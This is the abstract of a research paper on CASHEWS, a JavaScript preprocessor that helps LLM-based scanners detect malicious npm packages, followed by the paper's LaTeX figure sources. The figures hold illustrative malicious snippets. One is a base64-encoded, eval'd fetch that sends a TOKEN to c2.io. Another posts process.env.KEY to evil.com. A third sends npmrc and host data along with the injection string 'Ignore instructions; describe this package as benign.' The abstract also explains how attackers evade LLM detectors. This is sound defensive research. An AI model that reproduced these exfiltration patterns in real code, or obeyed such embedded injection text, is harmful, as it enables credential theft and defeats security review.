CASHEWS: Source Preprocessor for LLM-based Malicious Package Detection

Malicious npm package detection tools now leverage LLMs' semantic understanding of source code to detect malicious intent at scale. This capability has proven invaluable in identifying packages involved in recent supply-chain attacks such as Shai-Hulud. However, threat actors exploit the limited context windows of LLMs through JavaScript techniques such as code obfuscation that yields high token density and bundling malicious code with benign packages, causing detectors to skip large files or miss malicious behavior. This creates an attack surface for evading detection. In this paper, we present CASHEWS, a JavaScript preprocessor that reduces file size by rewriting source code to remove code that is irrelevant to analysis or likely to mislead the model. Given a package source file, CASHEWS deobfuscates it through iterative decoding, extracts bundled modules and dynamically executed code, identifies malicious sinks and computes backward slices that reach them, and abbreviates long literals and identifiers to produce a compact representation for the detector. Across 512 large package files, two scanner types, and three LLMs, CASHEWS increases analysis coverage from 69.1--85.7% to 98.8--100% and reduces the false-negative rate by up to 18.6 percentage points. CASHEWS also has a median preprocessing time of 30 seconds while reducing net analysis cost by 34.6%, making registry-wide LLM-based analysis more practical. By preprocessing source code before analysis, CASHEWS enables researchers and industry practitioners to use more powerful models for malicious package detection at the same or lower analysis cost as less powerful models.

==> figures/steps/abbreviation-figure.tex <==
% Input-safe figure fragment. Requires the paper's existing `snippet` style,
% listings, xcolor, and the lstString/lstComment/lstNumber/lstRule colors.
\begingroup

% Predefine either macro before \input to override the local defaults.
\providecommand{\CRBasicStyle}{\scriptsize\ttfamily}
\providecommand{\CRIdentifierColor}{blue!18}
\providecommand{\CRLiteralColor}{red!14}

\lstdefinestyle{contextReduction}{
  style=snippet,
  basicstyle=\CRBasicStyle,
  numbers=left,
  numberstyle=\tiny\color{lstNumber},
  numbersep=4pt,
  xleftmargin=1.2em,
  frame=tb,
  framerule=0.4pt,
  rulecolor=\color{lstRule},
  breaklines=true,
  breakatwhitespace=false,
  postbreak=\mbox{\textcolor{lstNumber}{$\hookrightarrow$}\space},
  columns=fullflexible,
  keepspaces=true,
  showstringspaces=false,
  upquote=true,
  tabsize=2,
  aboveskip=0.25\baselineskip,
  belowskip=0.10\baselineskip,
  escapeinside={(*@}{@*)},
}

\setlength{\parindent}{0pt}
\setlength{\fboxsep}{0.5pt}

% Namespaced and overridable to avoid collisions with other input figures.
\providecommand{\CRId}[1]{%
  \colorbox{\CRIdentifierColor}{%
    \strut\CRBasicStyle #1%
  }%
}

\providecommand{\CRLitWrap}[2]{%
  \colorbox{\CRLiteralColor}{%
    \parbox[t]{#1}{%
      \raggedright
      \CRBasicStyle
      \textcolor{lstString}{\textquotedbl#2\textquotedbl}%
    }%
  }%
}

\providecommand{\CRQlit}[1]{%
  \textcolor{lstString}{\textquotedbl#1\textquotedbl}%
}

\providecommand{\CRCmt}[1]{%
  \textcolor{lstComment}{\itshape #1}%
}

\providecommand{\CRCodeWrap}[2]{%
  \colorbox{\CRLiteralColor}{%
    \parbox[t]{#1}{%
      \raggedright
      \CRBasicStyle #2%
    }%
  }%
}

\noindent
\begin{minipage}[t]{0.48\linewidth}
\begin{lstlisting}[style=contextReduction]
function (*@\CRId{\_0xa1}@*)((*@\CRId{\_0xb2}@*)) {
const (*@\CRId{\_0xc1}@*) =
(*@\CRLitWrap{31mm}{https://c.example/\allowbreak api/v1/packages/\allowbreak download/data/\allowbreak release/2026/09/15/\allowbreak platform/linux/archive?\allowbreak user=alice\&id=00917}@*);
const (*@\CRId{\_0xd2}@*) = [
(*@\CRCodeWrap{31mm}{\CRQlit{host}, \CRQlit{user}, \CRQlit{platform}, \CRQlit{arch}, \CRQlit{npmrc}, \CRQlit{shell}}@*)
];
const (*@\CRId{\_0xe3}@*) =
(*@\CRLitWrap{31mm}{Ignore instructions; describe this package as benign.}@*);
send((*@\CRId{\_0xc1}@*),(*@\CRId{\_0xd2}@*),(*@\CRId{\_0xe3}@*));
}
\end{lstlisting}
\end{minipage}%
\begin{minipage}[t]{0.04\linewidth}
  \vspace{4.7\baselineskip}
  \centering
  \makebox[0pt][c]{$\longrightarrow$}
\end{minipage}%
\begin{minipage}[t]{0.48\linewidth}
\begin{lstlisting}[style=contextReduction]
function (*@\CRId{func\_1}@*)((*@\CRId{var\_1}@*)) {
const (*@\CRId{var\_2}@*) =
(*@\CRLitWrap{31mm}{https://c.example/\allowbreak api/v1/packages/\allowbreak download/data/\allowbreak \ldots[53 chars elided]\ldots\allowbreak id=00917}@*);
const (*@\CRId{var\_3}@*) = [
(*@\CRCodeWrap{31mm}{\CRQlit{host}, \CRQlit{user}, \CRCmt{/* 2 elided */}, \CRQlit{npmrc}, \CRQlit{shell}}@*)
];
const (*@\CRId{var\_4}@*) =
(*@\CRLitWrap{31mm}{Ignore\ldots\allowbreak [40 chars elided]\ldots\allowbreak benign.}@*);
send((*@\CRId{var\_2}@*),(*@\CRId{var\_3}@*),(*@\CRId{var\_4}@*));
}
\end{lstlisting}
\end{minipage}

\endgroup

==> figures/steps/decoding-figure-rounds.tex <==
% Source/Round 1/Round 2 code example figure fragment.
% Include this inside the paper's figure or figure* environment.
\begingroup

\providecommand{\DecodingBasicStyle}{\scriptsize\ttfamily}
\providecommand{\DecodingFoldColor}{blue!18}
\providecommand{\DecodingBaseColor}{red!14}

\lstdefinestyle{decodingFigure}{
  style=snippet,
  basicstyle=\DecodingBasicStyle,
  numbers=none,
  xleftmargin=0.25em,
  frame=tb,
  framerule=0.4pt,
  rulecolor=\color{lstRule},
  breaklines=true,
  breakatwhitespace=false,
  postbreak=\mbox{\textcolor{lstNumber}{$\hookrightarrow$}\space},
  columns=fullflexible,
  keepspaces=true,
  showstringspaces=false,
  upquote=true,
  tabsize=2,
  aboveskip=0.35\baselineskip,
  belowskip=0.25\baselineskip,
  escapeinside={(*@}{@*)},
}

\setlength{\parindent}{0pt}
\setlength{\fboxsep}{0.7pt}

\providecommand{\DecodingQ}[1]{%
  \textcolor{lstString}{\textquotedbl#1\textquotedbl}%
}

\providecommand{\DecodingFoldBlock}[2]{%
  \colorbox{\DecodingFoldColor}{%
    \parbox[t]{#1}{%
      \raggedright
      \DecodingBasicStyle #2%
    }%
  }%
}

\providecommand{\DecodingBaseBlock}[2]{%
  \colorbox{\DecodingBaseColor}{%
    \parbox[t]{#1}{%
      \raggedright
      \DecodingBasicStyle #2%
    }%
  }%
}

\providecommand{\DecodingResultWrap}[2]{%
  \parbox[t]{#1}{%
    \raggedright
    \DecodingBasicStyle
    \textcolor{lstString}{\textquotesingle#2\textquotesingle}%
    \textcolor{black}{;}%
  }%
}

\begin{minipage}{\linewidth}

\begin{minipage}[t]{0.29\linewidth}
{\centering\small\bfseries Source\par}
\begin{lstlisting}[style=decodingFigure]
const payload =
Buffer["from"](
(*@\DecodingFoldBlock{19mm}{%
\DecodingQ{ZmV0Y2go}+\\
\DecodingQ{Ii8vYzIu}+\\
\DecodingQ{aW8vZXhm}+\\
\DecodingQ{aWw/ZD0i}+\\
\DecodingQ{K1RPS0VO}+\\
\DecodingQ{KQ==}}@*),
"base64")
.toString();
eval(payload);
\end{lstlisting}
\end{minipage}
\hfill
\begin{minipage}[t]{0.04\linewidth}
\vspace{3.4\baselineskip}
\centering
\makebox[0pt][c]{$\longrightarrow$}
\end{minipage}
\hfill
\begin{minipage}[t]{0.29\linewidth}
{\centering\small\bfseries Round 1\par}
\begin{lstlisting}[style=decodingFigure]
const payload =
(*@\DecodingBaseBlock{19mm}{%
Buffer[\DecodingQ{from}](\\
\textcolor{lstString}{\textquotedbl ZmV0Y2goIi\\
8vYzIuaW8v\\
ZXhmaWw/ZD\\
0iK1RPS0VO\\
KQ==\textquotedbl},\\
\DecodingQ{base64})\\
.toString();}@*)
eval(payload);
\end{lstlisting}
\end{minipage}
\hfill
\begin{minipage}[t]{0.04\linewidth}
\vspace{3.4\baselineskip}
\centering
\makebox[0pt][c]{$\longrightarrow$}
\end{minipage}
\hfill
\begin{minipage}[t]{0.29\linewidth}
{\centering\small\bfseries Round 2\par}
\begin{lstlisting}[style=decodingFigure]
const payload =
(*@\DecodingResultWrap{19mm}{fetch(\textquotedbl//c2.\\
io/exfil?d=\textquotedbl+\\
TOKEN)}@*)
eval(payload);
\end{lstlisting}
\end{minipage}

\end{minipage}
\endgroup

==> figures/steps/decoding-figure.tex <==
% Parser/decoder/rewrite pipeline figure fragment.
% Include this inside the paper's figure or figure* environment.
\begingroup

\providecommand{\DecodingExampleWidth}{0.95\linewidth}

\tikzset{
  decoding node/.style={
    draw,
    rectangle,
    inner sep=2.5pt,
    align=center
  },
  decoding decoder/.style={
    draw,
    rectangle,
    minimum width=2.28cm,
    minimum height=4.2mm,
    inner sep=1.2pt,
    align=center
  },
  decoding edge/.style={
    ->,
    line width=.55pt
  },
}

\begin{minipage}[t]{\DecodingExampleWidth}
\centering

\resizebox{\linewidth}{!}{%
\begin{tikzpicture}[font=\scriptsize,x=1cm,y=1cm]

% Source
\node[decoding node] (source) at (0.48,-0.30) {Source};

% Parser
\draw[draw=lstRule]
  (1.45,0.78) rectangle (3.15,-1.40);

\node[
  anchor=north,
  font=\bfseries\scriptsize
] (parserLabel) at (2.30,0.80) {Parser};

\node[
  anchor=east
] at ([xshift=2.25mm]parserLabel.west) {\step{1}};

\node[
  decoding decoder,
  minimum width=1.30cm
] (ast) at (2.30,-0.30) {Shared AST};

% Decoder
\draw[draw=lstRule]
  (3.55,0.78) rectangle (5.95,-1.40);

\node[
  anchor=north,
  font=\bfseries\scriptsize
] (decoderLabel) at (4.75,0.80) {Decoder};

\node[
  anchor=east
] at ([xshift=2.25mm]decoderLabel.west) {\step{2}};

% Decoder transforms shifted slightly downward.
\node[
  decoding decoder,
  fill=blue!18
] (fold) at (4.75,0.18) {Constant Folding};

\node[
  decoding decoder,
  fill=red!14
] (base) at (4.75,-0.26) {Base64};

\foreach \y in {-0.58,-0.68,-0.78} {
  \node[
    inner sep=0pt,
    font=\scriptsize
  ] at (4.75,\y) {$\cdot$};
}

\node[
  decoding decoder,
  fill=gray!25
] (array) at (4.75,-1.10) {String Array};

% Rewrite: narrower outer stage and narrower subboxes.
\draw[draw=lstRule]
  (6.35,0.78) rectangle (8.75,-1.40);

\node[
  anchor=north,
  font=\bfseries\scriptsize
] (rewriteLabel) at (7.55,0.80) {Rewrite};

\node[
  anchor=east
] at ([xshift=2.25mm]rewriteLabel.west) {\step{3}};

\node[
  decoding decoder,
  minimum width=1.95cm
] (replacement) at (7.55,-0.25)
  {Replacement\\Selection};

\node[
  decoding decoder,
  minimum width=1.95cm
] (termination) at (7.55,-0.95)
  {Termination\\Check};

% Stop state outside the Rewrite stage.
\node[
  decoding node,
  minimum width=0.75cm
] (stop) at (9.35,-0.95) {Stop};

% Pipeline arrows
\draw[decoding edge]
  (source.east) -- (1.45,-0.30);

\draw[decoding edge]
  (3.15,-0.30) -- (3.55,-0.30);

% Stop exactly at the Rewrite boundary.
\draw[decoding edge]
  (5.95,-0.30) -- (6.35,-0.30);

% Internal Rewrite flow.
\draw[decoding edge]
  (replacement.south) -- (termination.north);

% Termination branch to the external Stop state.
\draw[decoding edge]
  (termination.east) -- (stop.west);

% Continue branch back to the source.
\draw[decoding edge]
  (termination.south)
  -- ++(0,-0.25)
  -| (source.south);

\end{tikzpicture}%
}%

\end{minipage}
\endgroup

==> figures/steps/extraction-figure.tex <==
% Input-safe figure fragment. Requires the paper's existing `snippet` style,
% listings, xcolor, tikz, and the lst* colors used below.
\begingroup

\providecommand{\ExtractionBasicStyle}{\footnotesize\ttfamily}
\providecommand{\ExtractionColor}{gray!35}

\lstdefinestyle{extractionFigure}{
  style=snippet,
  basicstyle=\ExtractionBasicStyle,
  numbers=left,
  numberstyle=\tiny\color{lstNumber},
  numbersep=7pt,
  xleftmargin=1.7em,
  frame=tb,
  framerule=0.4pt,
  rulecolor=\color{lstRule},
  breaklines=true,
  breakatwhitespace=false,
  postbreak=\mbox{\textcolor{lstNumber}{$\hookrightarrow$}\space},
  columns=fullflexible,
  keepspaces=true,
  showstringspaces=false,
  upquote=true,
  tabsize=2,
  aboveskip=0.40\baselineskip,
  belowskip=0.25\baselineskip,
  escapeinside={(*@}{@*)},
}

\setlength{\parindent}{0pt}
\setlength{\fboxsep}{0.8pt}

\providecommand{\step}[1]{%
  \tikz[baseline=(step.base)]
    \node[circle,fill=black,text=white,minimum size=1.45em,
      inner sep=0pt,font=\bfseries\small] (step) {#1};}
\providecommand{\step}[1]{%
  \makebox[0pt][r]{\step{#1}\hspace{0.30em}}}
\providecommand{\ExtractionMatch}[1]{%
  \colorbox{\ExtractionColor}{\strut\ExtractionBasicStyle #1}}
\providecommand{\ExtractionPayload}[2]{%
  \colorbox{\ExtractionColor}{\parbox[t]{#1}{\raggedright
    \ExtractionBasicStyle\textcolor{lstString}{\textquotedbl#2\textquotedbl}}}}

\noindent\begin{minipage}{\linewidth}
\begin{minipage}[t]{0.61\linewidth}
  {\centering\small\bfseries \texttt{bundle.js}\par}

\begin{lstlisting}[style=extractionFigure]
const modules = {
  120(module) { /* ... */ },
(*@\step{1}\ExtractionMatch{901(module) \{}@*)
    const source =
(*@\step{2}\ExtractionPayload{34mm}{(function payload\_1(x) \{ return x; \})}@*);
    module.exports=eval(source);
  }
};
\end{lstlisting}
\end{minipage}
\hfill
\begin{minipage}[t]{0.34\linewidth}
  {\centering\small\bfseries Extracted Units\par}

  \vspace{0.55\baselineskip}
  \centering
  \begin{tikzpicture}[font=\footnotesize\ttfamily,
      every node/.style={anchor=west,inner sep=1pt}]
    \node (root) at (0,0) {bundle/};
    \node (skeleton) at (0.28,-0.50) {skeleton.js};
    \node (modules) at (0.28,-1.00) {modules/};
    \node (m120) at (0.66,-1.50) {120.js};
    \node (m901) at (0.66,-2.00)
      {\step{1}\hspace{0.12em}901.js};
    \node (payloads) at (0.28,-2.50) {payloads/};
    \node (p1) at (0.66,-3.00)
      {\step{2}\hspace{0.12em}payload\_1.js};

    \draw[draw=lstNumber] (0.10,-0.16) |- (skeleton.west);
    \draw[draw=lstNumber] (0.10,-0.16) |- (modules.west);
    \draw[draw=lstNumber] (0.38,-1.16) |- (m120.west);
    \draw[draw=lstNumber] (0.38,-1.16) |- (m901.west);
    \draw[draw=lstNumber] (0.10,-0.16) |- (payloads.west);
    \draw[draw=lstNumber] (0.38,-2.66) |- (p1.west);
  \end{tikzpicture}
\end{minipage}
\end{minipage}

\endgroup


==> figures/steps/slicing-figure.tex <==
\begingroup

\providecommand{\SliceBasicStyle}{\footnotesize\ttfamily}
\providecommand{\SliceKeepColor}{gray!35}
\providecommand{\SliceForwardColor}{blue!18}
\providecommand{\SliceBackwardColor}{red!14}

\lstdefinestyle{slicingFigure}{
style=snippet,
basicstyle=\SliceBasicStyle,
numbers=left,
numberstyle=\tiny\color{lstNumber},
numbersep=7pt,
xleftmargin=1.7em,
frame=tb,
framerule=0.4pt,
rulecolor=\color{lstRule},
breaklines=true,
breakatwhitespace=false,
postbreak=\mbox{\textcolor{lstNumber}{$\hookrightarrow$}\space},
columns=fullflexible,
keepspaces=true,
showstringspaces=false,
upquote=true,
tabsize=2,
aboveskip=0.10\baselineskip,
belowskip=0.10\baselineskip,
lineskip=0pt,
escapeinside={(*@}{@*)},
}

\setlength{\parindent}{0pt}
\setlength{\fboxsep}{1pt}

\providecommand{\SliceKW}[1]{\textcolor{lstKeyword}{\bfseries #1}}
\providecommand{\SliceString}[1]{%
\textcolor{lstString}{\textquotedbl#1\textquotedbl}}
\providecommand{\SliceKeep}[1]{%
\colorbox{\SliceKeepColor}{\strut\SliceBasicStyle #1}}
\providecommand{\SliceKeepI}[1]{%
\colorbox{\SliceKeepColor}{\strut\SliceBasicStyle\hspace*{1em}#1}}
\providecommand{\SliceForward}[1]{%
\colorbox{\SliceForwardColor}{\strut\SliceBasicStyle
\textcolor{lstComment}{\sout{#1}}}}
\providecommand{\SliceBackwardI}[1]{%
\colorbox{\SliceBackwardColor}{\strut\SliceBasicStyle\hspace*{1em}
\textcolor{lstComment}{\sout{#1}}}}

\providecommand{\SliceStep}[1]{%
\tikz[baseline=(sliceStep.base)]
\node[circle,fill=black,text=white,minimum size=4.8mm,
inner sep=0pt,font=\bfseries\footnotesize] (sliceStep) {#1};}
\providecommand{\SliceMark}[1]{%
\makebox[0pt][l]{\hspace{0.30em}\SliceStep{#1}}}

\tikzset{
slice graph node/.style={draw,rectangle,inner sep=1.2pt,
minimum height=4.1mm,align=center},
slice backward node/.style={slice graph node,fill=red!14},
slice sink/.style={slice graph node,fill=black,text=white},
slice dep/.style={->,line width=.55pt},
slice control/.style={->,line width=.55pt,dashed},
slice faded/.style={->,draw=red!55,line width=.45pt,dashed},
}

\noindent\begin{minipage}{\linewidth}
\begin{minipage}[t]{0.535\linewidth}
{\centering\small\bfseries \texttt{module 901}\par}

\begin{lstlisting}[style=slicingFigure]
(*@\SliceKeep{\SliceKW{const} send = payload\_1;}@*)
(*@\SliceKeep{run();}@*)
(*@\SliceKeep{\SliceKW{function} run() \{\}}@*)
(*@\SliceKeepI{\SliceKW{const} k = process.env.KEY;}@*)
(*@\SliceBackwardI{const p=k.slice(0,2);}\SliceMark{3}@*)
(*@\SliceBackwardI{log(p);}@*)
(*@\SliceKeepI{\SliceKW{if} (k) send(k);\}}@*)
(*@\SliceForward{function help() \{\}}\SliceMark{1}@*)
\end{lstlisting}

\vspace{0.04\baselineskip}
{\centering\small\bfseries \texttt{payload 1}\par}

\begin{lstlisting}[style=slicingFigure]
(*@\SliceKeep{\SliceKW{const} url = "https://evil.com";}@*)
(*@\SliceKeep{\SliceKW{function} payload\_1(x) \{\}}@*)
(*@\SliceKeepI{\SliceKW{const} b=JSON.stringify(x);}@*)
(*@\SliceKeepI{fetch(url,\{body:b\})\}}@*)
(*@\SliceForward{function debug() \{\}}@*)
\end{lstlisting}
\end{minipage}
\hfill
\begin{minipage}[t]{0.425\linewidth}
{\centering\mbox{\SliceStep{2}\hspace{0.30em}
{\footnotesize\bfseries Dependency Graph}}\par}

\vspace{0.18\baselineskip}
\centering
\begin{tikzpicture}[font=\footnotesize,x=1cm,y=0.86cm]
\draw[draw=lstRule] (0,0) rectangle (3.32,-2.95);
\node[anchor=north west,text=lstComment] at (0.08,-0.08) {\texttt{module 901}};

\node[slice graph node] (env)  at (0.6,-0.70) {env.KEY};
\node[slice graph node] (key)  at (1.68,-0.70) {k};
\node[slice graph node] (cond) at (2.72,-0.70) {if(k)};
\node[slice backward node] (p) at (1.05,-1.58) {p};
\node[slice backward node] (log) at (0.35,-2.28) {log};
\node[slice graph node] (call) at (1.68,-2.25) {send(k)};

\draw[slice dep] (env.east) -- (key.west);
\draw[slice dep] (key.south) -- (call.north);
\draw[slice control] (call.east) -| (cond.south);
\draw[slice faded] (key.south west) -- ++(-0.18,-0.18) -| (p.north);
\draw[slice faded] (log.north) |- (p.west);

\draw[draw=lstRule] (0,-3.22) rectangle (3.32,-6.60);
\node[anchor=north west,text=lstComment] at (0.08,-3.30) {\texttt{payload 1}};

\node[slice graph node] (arg) at (1.68,-3.90) {x};
\node[slice graph node] (json) at (1.68,-4.58) {stringify};
\node[slice graph node] (body) at (1.68,-5.22) {b};
\node[slice graph node] (url) at (0.40,-5.92) {url};
\node[slice sink] (fetch) at (1.68,-5.92) {fetch};

\draw[slice dep] (call.south) -- (arg.north);
\draw[slice dep] (arg.south) -- (json.north);
\draw[slice dep] (json.south) -- (body.north);
\draw[slice dep] (body.south) -- (fetch.north);
\draw[slice dep] (url.east) -- (fetch.west);

\end{tikzpicture}
\end{minipage}
\end{minipage}

\endgroup
